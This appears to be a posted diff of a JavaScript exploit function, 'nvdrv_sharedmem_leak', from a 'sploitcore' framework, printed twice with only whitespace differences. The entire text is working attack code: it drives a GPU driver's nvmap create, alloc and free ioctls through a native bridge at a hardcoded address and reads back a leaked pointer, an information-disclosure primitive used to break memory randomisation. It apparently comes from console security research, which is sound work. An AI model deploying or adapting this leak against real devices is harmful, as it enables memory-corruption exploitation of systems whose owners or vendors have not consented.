hexkyz · December 28, 2018 19:09
diff --git a/sploitcore_nvdrv_leak.js b/sploitcore_nvdrv_leak.js
 sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
    var temp_buf = this.malloc(0x1000);
    var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
    
    // Setup buffers
    var in_buf_ioctl = utils.add2(temp_buf, 0x000);
    var out_buf_ioctl = utils.add2(temp_buf, 0x100);
    var out_buf_status = utils.add2(temp_buf, 0x200);
    var in_buf = utils.add2(temp_buf, 0x800);
    var out_buf = utils.add2(temp_buf, 0x900);
    var ioctl_num = 0;
    
    // Prepare in/out buffers
    this.write8(in_buf, in_buf_ioctl, 0x00/4);          // Write the input buffer's address
    this.write4(0x00000100, in_buf_ioctl, 0x08/4);      // Write the input buffer's size
    this.write8(out_buf, out_buf_ioctl, 0x00/4);        // Write the output buffer's address
    this.write4(0x00000100, out_buf_ioctl, 0x08/4);     // Write the output buffer's size
    
    // Setup the creation params
    this.write4(0x00010000, in_buf, 0x00/4);    
    
    // Call NVMAP_IOC_CREATE
    ioctl_num = 0xC0080101;
    var ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
    
    // Read status
    var ioctl_status = this.read4(out_buf_status);
    
    // Read back handle
    var nvmap_handle = this.read4(out_buf, 0x04/4);
    
    if (this.nvdrv_show_log)
        utils.log('nvdrv_ioctl (NVMAP_IOC_CREATE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_handle == 0x" + nvmap_handle.toString(16));
    
    // Setup the allocation params
    this.write4(nvmap_handle, in_buf, 0x00/4);      // handle
    this.write4(0x00000000, in_buf, 0x04/4);        // heap mask
    this.write4(0x00000001, in_buf, 0x08/4);        // flags
    this.write4(0x00001000, in_buf, 0x0C/4);        // align
    this.write4(0x00000000, in_buf, 0x10/4);        // kind
    this.write4(0x00000000, in_buf, 0x14/4);        // padding
    this.write4(0x00000000, in_buf, 0x18/4);        // mem_addr_lo
    this.write4(0x00000000, in_buf, 0x1C/4);        // mem_addr_hi
    
    // Call NVMAP_IOC_ALLOC
    ioctl_num = 0xC0200104;
    ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
    
    // Read status
    ioctl_status = this.read4(out_buf_status);
    
    // Read back result
    var nvmap_alloc_res = this.read4(out_buf);
    
    if (this.nvdrv_show_log)
        utils.log('nvdrv_ioctl (NVMAP_IOC_ALLOC): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_alloc_res == 0x" + nvmap_alloc_res.toString(16));
    
    // Setup the free params
    this.write4(nvmap_handle, in_buf, 0x00/4);      // handle
    this.write4(0x00000000, in_buf, 0x04/4);        // flags
    this.write4(0x00000000, in_buf, 0x08/4);        // mem_addr_lo
    this.write4(0x00000000, in_buf, 0x0C/4);        // mem_addr_hi
    this.write4(0x00000000, in_buf, 0x10/4);        // mem_size
    this.write4(0x00000000, in_buf, 0x14/4);        // mem_is_cached
    
    // Call NVMAP_IOC_FREE
    ioctl_num = 0xC0180105;
    ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
    
    // Read status
    ioctl_status = this.read4(out_buf_status);
    
    // Read back result
    var nvmap_free_res = this.read4(out_buf);
    
    if (this.nvdrv_show_log)
        utils.log('nvdrv_ioctl (NVMAP_IOC_FREE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_free_res == 0x" + nvmap_free_res.toString(16));
            
    // Read back the leaked pointer
    var leak_ptr = this.read8(out_buf, 0x08/4);
    utils.log('Leaked ptr: ' + utils.paddr(leak_ptr));
    
    this.free(temp_buf);
    return leak_ptr;
 }
	sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
	var temp_buf = this.malloc(0x1000);
	var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);

	// Setup buffers
	var in_buf_ioctl = utils.add2(temp_buf, 0x000);
	var out_buf_ioctl = utils.add2(temp_buf, 0x100);
	var out_buf_status = utils.add2(temp_buf, 0x200);
	var in_buf = utils.add2(temp_buf, 0x800);
	var out_buf = utils.add2(temp_buf, 0x900);
	var ioctl_num = 0;

	// Prepare in/out buffers
	this.write8(in_buf, in_buf_ioctl, 0x00/4); // Write the input buffer's address
	this.write4(0x00000100, in_buf_ioctl, 0x08/4); // Write the input buffer's size
	this.write8(out_buf, out_buf_ioctl, 0x00/4); // Write the output buffer's address
	this.write4(0x00000100, out_buf_ioctl, 0x08/4); // Write the output buffer's size

	// Setup the creation params
	this.write4(0x00010000, in_buf, 0x00/4);

	// Call NVMAP_IOC_CREATE
	ioctl_num = 0xC0080101;
	var ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);

	// Read status
	var ioctl_status = this.read4(out_buf_status);

	// Read back handle
	var nvmap_handle = this.read4(out_buf, 0x04/4);

	if (this.nvdrv_show_log)
	utils.log('nvdrv_ioctl (NVMAP_IOC_CREATE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_handle == 0x" + nvmap_handle.toString(16));

	// Setup the allocation params
	this.write4(nvmap_handle, in_buf, 0x00/4); // handle
	this.write4(0x00000000, in_buf, 0x04/4); // heap mask
	this.write4(0x00000001, in_buf, 0x08/4); // flags
	this.write4(0x00001000, in_buf, 0x0C/4); // align
	this.write4(0x00000000, in_buf, 0x10/4); // kind
	this.write4(0x00000000, in_buf, 0x14/4); // padding
	this.write4(0x00000000, in_buf, 0x18/4); // mem_addr_lo
	this.write4(0x00000000, in_buf, 0x1C/4); // mem_addr_hi

	// Call NVMAP_IOC_ALLOC
	ioctl_num = 0xC0200104;
	ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);

	// Read status
	ioctl_status = this.read4(out_buf_status);

	// Read back result
	var nvmap_alloc_res = this.read4(out_buf);

	if (this.nvdrv_show_log)
	utils.log('nvdrv_ioctl (NVMAP_IOC_ALLOC): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_alloc_res == 0x" + nvmap_alloc_res.toString(16));

	// Setup the free params
	this.write4(nvmap_handle, in_buf, 0x00/4); // handle
	this.write4(0x00000000, in_buf, 0x04/4); // flags
	this.write4(0x00000000, in_buf, 0x08/4); // mem_addr_lo
	this.write4(0x00000000, in_buf, 0x0C/4); // mem_addr_hi
	this.write4(0x00000000, in_buf, 0x10/4); // mem_size
	this.write4(0x00000000, in_buf, 0x14/4); // mem_is_cached

	// Call NVMAP_IOC_FREE
	ioctl_num = 0xC0180105;
	ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);

	// Read status
	ioctl_status = this.read4(out_buf_status);

	// Read back result
	var nvmap_free_res = this.read4(out_buf);

	if (this.nvdrv_show_log)
	utils.log('nvdrv_ioctl (NVMAP_IOC_FREE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_free_res == 0x" + nvmap_free_res.toString(16));

	// Read back the leaked pointer
	var leak_ptr = this.read8(out_buf, 0x08/4);
	utils.log('Leaked ptr: ' + utils.paddr(leak_ptr));

	this.free(temp_buf);
	return leak_ptr;
	}